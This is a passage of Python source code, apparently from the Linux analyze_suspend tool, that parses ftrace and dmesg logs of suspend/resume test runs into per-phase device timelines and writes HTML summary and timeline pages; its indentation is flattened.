for p in test.data.phases:
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
if(sysvals.verbose):
test.data.printDetails()
# add the time in between the tests as a new phase so we can see it
if(len(testruns) > 1):
t1e = testruns[0].getEnd()
t2s = testruns[-1].getStart()
testruns[-1].newPhaseWithSingleAction('user mode', \
'user mode', t1e, t2s, '#FF9966')
# Function: parseTraceLog
# Description:
# Analyze an ftrace log output file generated from this app during
# the execution phase. Used when the ftrace log is the primary data source
# and includes the suspend_resume and device_pm_callback trace events
# The ftrace filename is taken from sysvals
# Output:
# An array of Data objects
def parseTraceLog():
global sysvals
vprint('Analyzing the ftrace data...')
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s does not exist' % sysvals.ftracefile, False)
# extract the callgraph and traceevent data
testruns = []
testdata = []
testrun = 0
data = 0
tf = open(sysvals.ftracefile, 'r')
phase = 'suspend_prepare'
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
# stamp line: each stamp means a new test run
m = re.match(sysvals.stampfmt, line)
if(m):
data = Data(len(testdata))
testdata.append(data)
testrun = TestRun(data)
testruns.append(testrun)
parseStamp(m, data)
continue
if(not data):
continue
# firmware line: pull out any firmware data
m = re.match(sysvals.firmwarefmt, line)
if(m):
data.fwSuspend = int(m.group('s'))
data.fwResume = int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
continue
# tracer type line: determine the trace data type
m = re.match(sysvals.tracertypefmt, line)
if(m):
tracer = m.group('t')
testrun.setTracerType(tracer)
continue
# post resume time line: did this test run include post-resume data
m = re.match(sysvals.postresumefmt, line)
if(m):
t = int(m.group('t'))
if(t > 0):
sysvals.postresumetime = t
continue
# ftrace line: parse only valid lines
m = re.match(testrun.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(testrun.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# only parse the ftrace data during suspend/resume
if(not testrun.inthepipe):
# look for the suspend start marker
if(t.fevent):
if(t.name == 'SUSPEND START'):
testrun.inthepipe = True
data.setStart(t.time)
continue
# trace event processing
if(t.fevent):
if(t.name == 'RESUME COMPLETE'):
if(sysvals.postresumetime > 0):
phase = 'post_resume'
data.newPhase(phase, t.time, t.time, '#FF9966', -1)
else:
testrun.inthepipe = False
data.setEnd(t.time)
continue
if(phase == 'post_resume'):
data.setEnd(t.time)
if(t.type == 'suspend_resume'):
# suspend_resume trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
m = re.match('(?P<name>.*)\[(?P<val>[0-9]*)\] .*', t.name)
if(m):
val = m.group('val')
if val == '0':
name = m.group('name')
else:
name = m.group('name')+'['+val+']'
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
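# e.g. 'machine_suspend[1] begin' gives isbegin=True, name='machine_suspend[1]';
# a '[0]' suffix is dropped from the name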
# ignore these events
if(re.match('acpi_suspend\[.*', t.name) or
re.match('suspend_enter\[.*', name)):
continue
# -- phase changes --
# suspend_prepare start
if(re.match('dpm_prepare\[.*', t.name)):
phase = 'suspend_prepare'
if(not isbegin):
data.dmesg[phase]['end'] = t.time
continue
# suspend start
elif(re.match('dpm_suspend\[.*', t.name)):
phase = 'suspend'
data.setPhase(phase, t.time, isbegin)
continue
# suspend_late start
elif(re.match('dpm_suspend_late\[.*', t.name)):
phase = 'suspend_late'
data.setPhase(phase, t.time, isbegin)
continue
# suspend_noirq start
elif(re.match('dpm_suspend_noirq\[.*', t.name)):
phase = 'suspend_noirq'
data.setPhase(phase, t.time, isbegin)
if(not isbegin):
phase = 'suspend_machine'
data.dmesg[phase]['start'] = t.time
continue
# suspend_machine/resume_machine
elif(re.match('machine_suspend\[.*', t.name)):
if(isbegin):
phase = 'suspend_machine'
data.dmesg[phase]['end'] = t.time
data.tSuspended = t.time
else:
if(sysvals.suspendmode in ['mem', 'disk']):
data.dmesg['suspend_machine']['end'] = t.time
data.tSuspended = t.time
phase = 'resume_machine'
data.dmesg[phase]['start'] = t.time
data.tResumed = t.time
data.tLow = data.tResumed - data.tSuspended
continue
# resume_noirq start
elif(re.match('dpm_resume_noirq\[.*', t.name)):
phase = 'resume_noirq'
data.setPhase(phase, t.time, isbegin)
if(isbegin):
data.dmesg['resume_machine']['end'] = t.time
continue
# resume_early start
elif(re.match('dpm_resume_early\[.*', t.name)):
phase = 'resume_early'
data.setPhase(phase, t.time, isbegin)
continue
# resume start
elif(re.match('dpm_resume\[.*', t.name)):
phase = 'resume'
data.setPhase(phase, t.time, isbegin)
continue
# resume complete start
elif(re.match('dpm_complete\[.*', t.name)):
phase = 'resume_complete'
if(isbegin):
data.dmesg[phase]['start'] = t.time
continue
# is this trace event outside of the device calls?
if(data.isTraceEventOutsideDeviceCalls(pid, t.time)):
# global events (outside device calls) are simply graphed
if(name not in testrun.ttemp):
testrun.ttemp[name] = []
if(isbegin):
# create a new list entry
testrun.ttemp[name].append(\
{'begin': t.time, 'end': t.time})
else:
if(len(testrun.ttemp[name]) > 0):
# if an entry exists, assume this is its end
testrun.ttemp[name][-1]['end'] = t.time
elif(phase == 'post_resume'):
# post resume events can just have ends
testrun.ttemp[name].append({
'begin': data.dmesg[phase]['start'],
'end': t.time})
else:
if(isbegin):
data.addIntraDevTraceEvent('', name, pid, t.time)
else:
data.capIntraDevTraceEvent('', name, pid, t.time)
# device callback start
elif(t.type == 'device_pm_callback_start'):
m = re.match('(?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*',\
t.name);
if(not m):
continue
drv = m.group('drv')
n = m.group('d')
p = m.group('p')
if(n and p):
data.newAction(phase, n, pid, p, t.time, -1, drv)
# device callback finish
elif(t.type == 'device_pm_callback_end'):
m = re.match('(?P<drv>.*) (?P<d>.*), err.*', t.name);
if(not m):
continue
n = m.group('d')
list = data.dmesg[phase]['list']
if(n in list):
dev = list[n]
dev['length'] = t.time - dev['start']
dev['end'] = t.time
# callgraph processing
elif sysvals.usecallgraph:
# this shouldn't happen, but just in case, ignore callgraph data after resume
if(phase == 'post_resume'):
continue
# create a callgraph object for the data
if(pid not in testrun.ftemp):
testrun.ftemp[pid] = []
testrun.ftemp[pid].append(FTraceCallGraph())
# when the call is finished, see which device matches it
cg = testrun.ftemp[pid][-1]
if(cg.addLine(t, m)):
testrun.ftemp[pid].append(FTraceCallGraph())
tf.close()
for test in testruns:
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
for name in test.ttemp:
for event in test.ttemp[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < test.data.start):
test.data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > test.data.end):
test.data.setEnd(end)
test.data.newActionGlobal(name, begin, end)
# add the callgraph data to the device hierarchy
borderphase = {
'dpm_prepare': 'suspend_prepare',
'dpm_complete': 'resume_complete'
}
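# dpm_prepare and dpm_complete callgraphs span their entire phase, so each
# matching device only receives the slice of the graph inside its own window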
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if len(cg.list) < 2:
continue
if(not cg.sanityCheck()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
if(cg.list[0].name in borderphase):
p = borderphase[cg.list[0].name]
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg.slice(dev['start'], dev['end'])
continue
if(cg.list[0].name != 'dpm_run_callback'):
continue
for p in test.data.phases:
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
# fill in any missing phases
for data in testdata:
lp = data.phases[0]
for p in data.phases:
if(data.dmesg[p]['start'] < 0 and data.dmesg[p]['end'] < 0):
print('WARNING: phase "%s" is missing!' % p)
if(data.dmesg[p]['start'] < 0):
data.dmesg[p]['start'] = data.dmesg[lp]['end']
if(p == 'resume_machine'):
data.tSuspended = data.dmesg[lp]['end']
data.tResumed = data.dmesg[lp]['end']
data.tLow = 0
if(data.dmesg[p]['end'] < 0):
data.dmesg[p]['end'] = data.dmesg[p]['start']
lp = p
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
if(sysvals.verbose):
data.printDetails()
# add the time in between the tests as a new phase so we can see it
if(len(testdata) > 1):
t1e = testdata[0].getEnd()
t2s = testdata[-1].getStart()
testdata[-1].newPhaseWithSingleAction('user mode', \
'user mode', t1e, t2s, '#FF9966')
return testdata
# Function: loadKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# load the dmesg file into memory and fix up any ordering issues
# The dmesg filename is taken from sysvals
# Output:
# An array of empty Data objects with only their dmesgtext attributes set
def loadKernelLog():
global sysvals
vprint('Analyzing the dmesg data...')
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s does not exist' % sysvals.dmesgfile, False)
# there can be multiple test runs in a single file delineated by stamps
testruns = []
data = 0
lf = open(sysvals.dmesgfile, 'r')
for line in lf:
line = line.replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match(sysvals.stampfmt, line)
if(m):
if(data):
testruns.append(data)
data = Data(len(testruns))
parseStamp(m, data)
continue
if(not data):
continue
m = re.match(sysvals.firmwarefmt, line)
if(m):
data.fwSuspend = int(m.group('s'))
data.fwResume = int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
data.dmesgtext.append(line)
if(re.match('ACPI: resume from mwait', m.group('msg'))):
print('NOTE: This suspend appears to be freeze rather than'+\
' %s, it will be treated as such' % sysvals.suspendmode)
sysvals.suspendmode = 'freeze'
else:
vprint('ignoring dmesg line: %s' % line.replace('\n', ''))
testruns.append(data)
lf.close()
if(not data):
print('ERROR: analyze_suspend header missing from dmesg log')
sys.exit()
# fix lines where a call and its return share the same timestamp but appear in swapped order
for data in testruns:
last = ''
for line in data.dmesgtext:
mc = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) calling '+\
'(?P<f>.*)\+ @ .*, parent: .*', line)
mr = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) call '+\
'(?P<f>.*)\+ returned .* after (?P<dt>.*) usecs', last)
if(mc and mr and (mc.group('t') == mr.group('t')) and
(mc.group('f') == mr.group('f'))):
i = data.dmesgtext.index(last)
j = data.dmesgtext.index(line)
data.dmesgtext[i] = line
data.dmesgtext[j] = last
last = line
return testruns
# Function: parseKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# Analyze a dmesg log output file generated from this app during
# the execution phase. Create a set of device structures in memory
# for subsequent formatting in the html output file
# This call is only for legacy support on kernels where the ftrace
# data lacks the suspend_resume or device_pm_callbacks trace events.
# Arguments:
# data: an empty Data object (with dmesgtext) obtained from loadKernelLog
# Output:
# The filled Data object
def parseKernelLog(data):
global sysvals
phase = 'suspend_runtime'
if(data.fwValid):
vprint('Firmware Suspend = %u ns, Firmware Resume = %u ns' % \
(data.fwSuspend, data.fwResume))
# dmesg phase match table
dm = {
'suspend_prepare': 'PM: Syncing filesystems.*',
'suspend': 'PM: Entering [a-z]* sleep.*',
'suspend_late': 'PM: suspend of devices complete after.*',
'suspend_noirq': 'PM: late suspend of devices complete after.*',
'suspend_machine': 'PM: noirq suspend of devices complete after.*',
'resume_machine': 'ACPI: Low-level resume complete.*',
'resume_noirq': 'ACPI: Waking up from system sleep state.*',
'resume_early': 'PM: noirq resume of devices complete after.*',
'resume': 'PM: early resume of devices complete after.*',
'resume_complete': 'PM: resume of devices complete after.*',
'post_resume': '.*Restarting tasks \.\.\..*',
}
if(sysvals.suspendmode == 'standby'):
dm['resume_machine'] = 'PM: Restoring platform NVS memory'
elif(sysvals.suspendmode == 'disk'):
dm['suspend_late'] = 'PM: freeze of devices complete after.*'
dm['suspend_noirq'] = 'PM: late freeze of devices complete after.*'
dm['suspend_machine'] = 'PM: noirq freeze of devices complete after.*'
dm['resume_machine'] = 'PM: Restoring platform NVS memory'
dm['resume_early'] = 'PM: noirq restore of devices complete after.*'
dm['resume'] = 'PM: early restore of devices complete after.*'
dm['resume_complete'] = 'PM: restore of devices complete after.*'
elif(sysvals.suspendmode == 'freeze'):
dm['resume_machine'] = 'ACPI: resume from mwait'
# action table (expected events that occur and show up in dmesg)
at = {
'sync_filesystems': {
'smsg': 'PM: Syncing filesystems.*',
'emsg': 'PM: Preparing system for mem sleep.*' },
'freeze_user_processes': {
'smsg': 'Freezing user space processes .*',
'emsg': 'Freezing remaining freezable tasks.*' },
'freeze_tasks': {
'smsg': 'Freezing remaining freezable tasks.*',
'emsg': 'PM: Entering (?P<mode>[a-z,A-Z]*) sleep.*' },
'ACPI prepare': {
'smsg': 'ACPI: Preparing to enter system sleep state.*',
'emsg': 'PM: Saving platform NVS memory.*' },
'PM nvs': {
'smsg': 'PM: Saving platform NVS memory.*',
'emsg': 'Disabling non-boot CPUs .*' },
}
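# each action above is bounded by its start message (smsg) and end message (emsg)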
t0 = -1.0
cpu_start = -1.0
prevktime = -1.0
actions = dict()
for line in data.dmesgtext:
# -- preprocessing --
# parse each dmesg line into the time and message
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
val = m.group('ktime')
try:
ktime = float(val)
except:
doWarning('INVALID DMESG LINE: '+\
line.replace('\n', ''), 'dmesg')
continue
msg = m.group('msg')
# initialize data start to first line time
if t0 < 0:
data.setStart(ktime)
t0 = ktime
else:
continue
# hack for determining resume_machine end for freeze
if(not sysvals.usetraceevents and sysvals.suspendmode == 'freeze' \
and phase == 'resume_machine' and \
re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
data.dmesg['resume_machine']['end'] = ktime
phase = 'resume_noirq'
data.dmesg[phase]['start'] = ktime
# -- phase changes --
# suspend_prepare start
if(re.match(dm['suspend_prepare'], msg)):
phase = 'suspend_prepare'
data.dmesg[phase]['start'] = ktime
data.setStart(ktime)
# suspend start
elif(re.match(dm['suspend'], msg)):
data.dmesg['suspend_prepare']['end'] = ktime
phase = 'suspend'
data.dmesg[phase]['start'] = ktime
# suspend_late start
elif(re.match(dm['suspend_late'], msg)):
data.dmesg['suspend']['end'] = ktime
phase = 'suspend_late'
data.dmesg[phase]['start'] = ktime
# suspend_noirq start
elif(re.match(dm['suspend_noirq'], msg)):
data.dmesg['suspend_late']['end'] = ktime
phase = 'suspend_noirq'
data.dmesg[phase]['start'] = ktime
# suspend_machine start
elif(re.match(dm['suspend_machine'], msg)):
data.dmesg['suspend_noirq']['end'] = ktime
phase = 'suspend_machine'
data.dmesg[phase]['start'] = ktime
# resume_machine start
elif(re.match(dm['resume_machine'], msg)):
if(sysvals.suspendmode in ['freeze', 'standby']):
data.tSuspended = prevktime
data.dmesg['suspend_machine']['end'] = prevktime
else:
data.tSuspended = ktime
data.dmesg['suspend_machine']['end'] = ktime
phase = 'resume_machine'
data.tResumed = ktime
data.tLow = data.tResumed - data.tSuspended
data.dmesg[phase]['start'] = ktime
# resume_noirq start
elif(re.match(dm['resume_noirq'], msg)):
data.dmesg['resume_machine']['end'] = ktime
phase = 'resume_noirq'
data.dmesg[phase]['start'] = ktime
# resume_early start
elif(re.match(dm['resume_early'], msg)):
data.dmesg['resume_noirq']['end'] = ktime
phase = 'resume_early'
data.dmesg[phase]['start'] = ktime
# resume start
elif(re.match(dm['resume'], msg)):
data.dmesg['resume_early']['end'] = ktime
phase = 'resume'
data.dmesg[phase]['start'] = ktime
# resume complete start
elif(re.match(dm['resume_complete'], msg)):
data.dmesg['resume']['end'] = ktime
phase = 'resume_complete'
data.dmesg[phase]['start'] = ktime
# post resume start
elif(re.match(dm['post_resume'], msg)):
data.dmesg['resume_complete']['end'] = ktime
data.setEnd(ktime)
phase = 'post_resume'
break
# -- device callbacks --
if(phase in data.phases):
# device init call
if(re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
sm = re.match('calling (?P<f>.*)\+ @ '+\
'(?P<n>.*), parent: (?P<p>.*)', msg);
f = sm.group('f')
n = sm.group('n')
p = sm.group('p')
if(f and n and p):
data.newAction(phase, f, int(n), p, ktime, -1, '')
# device init return
elif(re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs', msg)):
sm = re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs(?P<a>.*)', msg);
f = sm.group('f')
t = sm.group('t')
list = data.dmesg[phase]['list']
if(f in list):
dev = list[f]
dev['length'] = int(t)
dev['end'] = ktime
# -- non-device-callback actions --
# if trace events are not available, these are better than nothing
if(not sysvals.usetraceevents):
# look for known actions
for a in at:
if(re.match(at[a]['smsg'], msg)):
if(a not in actions):
actions[a] = []
actions[a].append({'begin': ktime, 'end': ktime})
if(re.match(at[a]['emsg'], msg)):
actions[a][-1]['end'] = ktime
# now look for CPU on/off events
if(re.match('Disabling non-boot CPUs .*', msg)):
# start of first cpu suspend
cpu_start = ktime
elif(re.match('Enabling non-boot CPUs .*', msg)):
# start of first cpu resume
cpu_start = ktime
elif(re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)):
# end of a cpu suspend, start of the next
m = re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
elif(re.match('CPU(?P<cpu>[0-9]*) is up', msg)):
# end of a cpu resume, start of the next
m = re.match('CPU(?P<cpu>[0-9]*) is up', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
prevktime = ktime
# fill in any missing phases
lp = data.phases[0]
for p in data.phases:
if(data.dmesg[p]['start'] < 0 and data.dmesg[p]['end'] < 0):
print('WARNING: phase "%s" is missing, something went wrong!' % p)
print(' In %s, this dmesg line denotes the start of %s:' % \
(sysvals.suspendmode, p))
print(' "%s"' % dm[p])
if(data.dmesg[p]['start'] < 0):
data.dmesg[p]['start'] = data.dmesg[lp]['end']
if(p == 'resume_machine'):
data.tSuspended = data.dmesg[lp]['end']
data.tResumed = data.dmesg[lp]['end']
data.tLow = 0
if(data.dmesg[p]['end'] < 0):
data.dmesg[p]['end'] = data.dmesg[p]['start']
lp = p
# fill in any actions we've found
for name in actions:
for event in actions[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < data.start):
data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > data.end):
data.setEnd(end)
data.newActionGlobal(name, begin, end)
if(sysvals.verbose):
data.printDetails()
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
return True
# Function: setTimelineRows
# Description:
# Organize the timeline entries into the smallest
# number of rows possible, with no entry overlapping
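# e.g. two entries whose time ranges overlap must go on different rows,
# while non-overlapping entries can share a row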
# Arguments:
# list: the list of devices/actions for a single phase
# sortedkeys: chronologically sorted key list to use
# Output:
# The total number of rows needed to display this phase of the timeline
def setTimelineRows(list, sortedkeys):
# clear all rows and set them to undefined
remaining = len(list)
rowdata = dict()
row = 0
for item in list:
list[item]['row'] = -1
# try to pack each row with as many ranges as possible
while(remaining > 0):
if(row not in rowdata):
rowdata[row] = []
for item in sortedkeys:
if(list[item]['row'] < 0):
s = list[item]['start']
e = list[item]['end']
valid = True
for ritem in rowdata[row]:
rs = ritem['start']
rend = ritem['end']
if(not (((s <= rs) and (e <= rs)) or
((s >= rend) and (e >= rend)))):
valid = False
break
if(valid):
rowdata[row].append(list[item])
list[item]['row'] = row
remaining -= 1
row += 1
return row
# Function: createTimeScale
# Description:
# Create the timescale header for the html timeline
# Arguments:
# t0: start time (suspend begin)
# tMax: end time (resume end)
# tSuspended: time when suspend occurs, i.e. the zero time
# Output:
# The html code needed to display the time scale
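# tick spacing is 0.1s, or 1s when the total time exceeds 4 seconds; the
# tick at the suspend/resume transition is labeled "S/R"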
def createTimeScale(t0, tMax, tSuspended):
timescale = '<div class="t" style="right:{0}%">{1}</div>\n'
output = '<div id="timescale">\n'
# set scale for timeline
tTotal = tMax - t0
tS = 0.1
if(tTotal <= 0):
return output
if(tTotal > 4):
tS = 1
if(tSuspended < 0):
for i in range(int(tTotal/tS)+1):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/tTotal))
if(i > 0):
val = '%0.fms' % (float(i)*tS*1000)
else:
val = ''
output += timescale.format(pos, val)
else:
tSuspend = tSuspended - t0
divTotal = int(tTotal/tS) + 1
divSuspend = int(tSuspend/tS)
s0 = (tSuspend - tS*divSuspend)*100/tTotal
for i in range(divTotal):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/tTotal) - s0)
if((i == 0) and (s0 < 3)):
val = ''
elif(i == divSuspend):
val = 'S/R'
else:
val = '%0.fms' % (float(i-divSuspend)*tS*1000)
output += timescale.format(pos, val)
output += '</div>\n'
return output
# Function: createHTMLSummarySimple
# Description:
# Create summary html file for a series of tests
# Arguments:
# testruns: array of Data objects from parseTraceLog
def createHTMLSummarySimple(testruns, htmlfile):
global sysvals
# print out the basic summary of all the tests
hf = open(htmlfile, 'w')
# write the html header first (html head, css code, up to body start)
html = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>AnalyzeSuspend Summary</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y: scroll;}\n\
.stamp {width: 100%;text-align:center;background-color:#495E09;line-height:30px;color:white;font: 25px Arial;}\n\
table {width:100%;border-collapse: collapse;}\n\
.summary {font: 22px Arial;border:1px solid;}\n\
th {border: 1px solid black;background-color:#A7C942;color:white;}\n\
td {text-align: center;}\n\
tr.alt td {background-color:#EAF2D3;}\n\
tr.avg td {background-color:#BDE34C;}\n\
a:link {color: #90B521;}\n\
a:visited {color: #495E09;}\n\
a:hover {color: #B1DF28;}\n\
a:active {color: #FFFFFF;}\n\
</style>\n</head>\n<body>\n'
# group test header
count = len(testruns)
headline_stamp = '<div class="stamp">{0} {1} {2} {3} ({4} tests)</div>\n'
html += headline_stamp.format(sysvals.stamp['host'],
sysvals.stamp['kernel'], sysvals.stamp['mode'],
sysvals.stamp['time'], count)
# check to see if all the tests have the same value
stampcolumns = False
for data in testruns:
if diffStamp(sysvals.stamp, data.stamp):
stampcolumns = True
break
th = '\t<th>{0}</th>\n'
td = '\t<td>{0}</td>\n'
tdlink = '\t<td><a href="{0}">Click Here</a></td>\n'
# table header
html += '<table class="summary">\n<tr>\n'
html += th.format("Test #")
if stampcolumns:
html += th.format("Hostname")
html += th.format("Kernel Version")
html += th.format("Suspend Mode")
html += th.format("Test Time")
html += th.format("Suspend Time")
html += th.format("Resume Time")
html += th.format("Detail")
html += '</tr>\n'
# test data, 1 row per test
sTimeAvg = 0.0
rTimeAvg = 0.0
num = 1
for data in testruns:
# data.end is the end of post_resume
resumeEnd = data.dmesg['resume_complete']['end']
if num % 2 == 1:
html += '<tr class="alt">\n'
else:
html += '<tr>\n'
# test num
html += td.format("test %d" % num)
num += 1
if stampcolumns:
# host name
val = "unknown"
if('host' in data.stamp):
val = data.stamp['host']
html += td.format(val)
# host kernel
val = "unknown"
if('kernel' in data.stamp):
val = data.stamp['kernel']
html += td.format(val)
# suspend mode
val = "unknown"
if('mode' in data.stamp):
val = data.stamp['mode']
html += td.format(val)
# test time
val = "unknown"
if('time' in data.stamp):
val = data.stamp['time']
html += td.format(val)
# suspend time
sTime = (data.tSuspended - data.start)*1000
sTimeAvg += sTime
html += td.format("%3.3f ms" % sTime)
# resume time
rTime = (resumeEnd - data.tResumed)*1000
rTimeAvg += rTime
html += td.format("%3.3f ms" % rTime)
# link to the output html
html += tdlink.format(data.outfile)
html += '</tr>\n'
# last line: test average
if(count > 0):
sTimeAvg /= count
rTimeAvg /= count
html += '<tr class="avg">\n'
html += td.format('Average') # name
if stampcolumns:
html += td.format('') # host
html += td.format('') # kernel
html += td.format('') # mode
html += td.format('') # time
html += td.format("%3.3f ms" % sTimeAvg) # suspend time
html += td.format("%3.3f ms" % rTimeAvg) # resume time
html += td.format('') # output link
html += '</tr>\n'
# flush the data to file
hf.write(html+'</table>\n')
hf.write('</body>\n</html>\n')
hf.close()
# Function: createHTML
# Description:
# Create the output html file from the resident test data
# Arguments:
# testruns: array of Data objects from parseKernelLog or parseTraceLog
# Output:
# True if the html file was created, false if it failed
def createHTML(testruns):
global sysvals
for data in testruns:
data.normalizeTime(testruns[-1].tSuspended)
x2changes = ['', 'absolute']
if len(testruns) > 1:
x2changes = ['1', 'relative']
# html function templates
headline_stamp = '<div class="stamp">{0} {1} {2} {3}</div>\n'
html_devlist1 = '<button id="devlist1" class="devlist" style="float:left;">Device Detail%s</button>' % x2changes[0]
html_zoombox = '<center><button id="zoomin">ZOOM IN</button><button id="zoomout">ZOOM OUT</button><button id="zoomdef">ZOOM 1:1</button></center>\n'
html_devlist2 = '<button id="devlist2" class="devlist" style="float:right;">Device Detail2</button>\n'
html_timeline = '<div id="dmesgzoombox" class="zoombox">\n<div id="{0}" class="timeline" style="height:{1}px">\n'
html_device = '<div id="{0}" title="{1}" class="thread" style="left:{2}%;top:{3}%;height:{4}%;width:{5}%;">{6}</div>\n'
html_traceevent = '<div title="{0}" class="traceevent" style="left:{1}%;top:{2}%;height:{3}%;width:{4}%;border:1px solid {5};background-color:{5}">{6}</div>\n'
html_phase = '<div class="phase" style="left:{0}%;width:{1}%;top:{2}%;height:{3}%;background-color:{4}">{5}</div>\n'
html_phaselet = '<div id="{0}" class="phaselet" style="left:{1}%;width:{2}%;background-color:{3}"></div>\n'
html_legend = '<div class="square" style="left:{0}%;background-color:{1}"> {2}</div>\n'
html_timetotal = '<table class="time1">\n<tr>'\
'<td class="green">{2} Suspend Time: <b>{0} ms</b></td>'\
'<td class="yellow">{2} Resume Time: <b>{1} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal2 = '<table class="time1">\n<tr>'\
'<td class="green">{3} Suspend Time: <b>{0} ms</b></td>'\
'<td class="gray">'+sysvals.suspendmode+' time: <b>{1} ms</b></td>'\
'<td class="yellow">{3} Resume Time: <b>{2} ms</b></td>'\
'</tr>\n</table>\n'
html_timegroups = '<table class="time2">\n<tr>'\
'<td class="green">{4}Kernel Suspend: {0} ms</td>'\
'<td class="purple">{4}Firmware Suspend: {1} ms</td>'\
'<td class="purple">{4}Firmware Resume: {2} ms</td>'\
'<td class="yellow">{4}Kernel Resume: {3} ms</td>'\
'</tr>\n</table>\n'
# device timeline
vprint('Creating Device Timeline...')
devtl = Timeline()
# Generate the header for this timeline
textnum = ['First', 'Second']
for data in testruns:
tTotal = data.end - data.start
tEnd = data.dmesg['resume_complete']['end']
if(tTotal == 0):
print('ERROR: No timeline data')
sys.exit()
if(data.tLow > 0):
low_time = '%.0f'%(data.tLow*1000)
if data.fwValid:
suspend_time = '%.0f'%((data.tSuspended-data.start)*1000 + \
(data.fwSuspend/1000000.0))
resume_time = '%.0f'%((tEnd-data.tSuspended)*1000 + \
(data.fwResume/1000000.0))
testdesc1 = 'Total'
testdesc2 = ''
if(len(testruns) > 1):
testdesc1 = testdesc2 = textnum[data.testnumber]
testdesc2 += ' '
if(data.tLow == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc1)
else:
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc1)
devtl.html['timeline'] += thtml
sktime = '%.3f'%((data.dmesg['suspend_machine']['end'] - \
data.getStart())*1000)
sftime = '%.3f'%(data.fwSuspend / 1000000.0)
rftime = '%.3f'%(data.fwResume / 1000000.0)
rktime = '%.3f'%((data.getEnd() - \
data.dmesg['resume_machine']['start'])*1000)
devtl.html['timeline'] += html_timegroups.format(sktime, \
sftime, rftime, rktime, testdesc2)
else:
suspend_time = '%.0f'%((data.tSuspended-data.start)*1000)
resume_time = '%.0f'%((tEnd-data.tSuspended)*1000)
testdesc = 'Kernel'
if(len(testruns) > 1):
testdesc = textnum[data.testnumber]+' '+testdesc
if(data.tLow == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc)
else:
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc)
devtl.html['timeline'] += thtml
# time scale for potentially multiple datasets
t0 = testruns[0].start
tMax = testruns[-1].end
tSuspended = testruns[-1].tSuspended
tTotal = tMax - t0
# determine the maximum number of rows we need to draw
timelinerows = 0
for data in testruns:
for phase in data.dmesg:
list = data.dmesg[phase]['list']
rows = setTimelineRows(list, list)
data.dmesg[phase]['row'] = rows
if(rows > timelinerows):
timelinerows = rows
# calculate the timeline height and create bounding box, add buttons
devtl.setRows(timelinerows + 1)
devtl.html['timeline'] += html_devlist1
if len(testruns) > 1:
devtl.html['timeline'] += html_devlist2
